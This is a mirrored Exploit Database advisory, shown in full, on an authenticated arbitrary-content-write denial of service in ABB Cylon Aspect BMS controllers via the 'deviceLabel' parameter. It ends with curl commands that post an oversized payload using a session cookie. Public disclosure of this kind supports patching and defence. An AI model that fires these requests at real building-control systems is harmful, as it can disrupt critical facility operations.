ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) – File Write DoS

• Exploit Database
• 11 阅读

• 作者： LiquidWorm
  日期： 2025-04-16
• 类别：

  • hardware
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/52234/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84

  # Exploit title: ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) File Write DoS # Vendor: ABB Ltd. # Product web page: https://www.global.abb # Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.03   Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices.   Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated arbitrary content injection vulnerability in the webServerDeviceLabelUpdate.php script due to a lack of input validation. Authenticated attackers can exploit the &apos;deviceLabel&apos; POST parameter to write arbitrary content to a fixed file location at /usr/local/aam/etc/deviceLabel, potentially causing a denial of service.   Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0     Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic @zeroscience     Advisory ID: ZSL-2025-5892 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5892.php     21.04.2024   --     $ cat project   P R O J E C T   .| | | |&apos;|._____ ___|||. |&apos; .---"| _.-&apos; &apos;-. || .--&apos;||| | _|| .-&apos;|_.|||| &apos;-__| ||||| |&apos; | |.||| | | ||||| ____|&apos;-&apos; &apos;"" &apos;-&apos; &apos;-.&apos;&apos;`|____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░   $ curl http://192.168.73.31/webServerDeviceLabelUpdate.php \ > -H "Cookie: PHPSESSID=xxx" \ > -d "deviceLabel=`printf &apos;%.0sA&apos; {1..10000}`"\ > # --data-urlencode "deviceLabel@largecontent.txt"   $ curl http://192.168.73.31/webServerConfiguration.php | grep AAA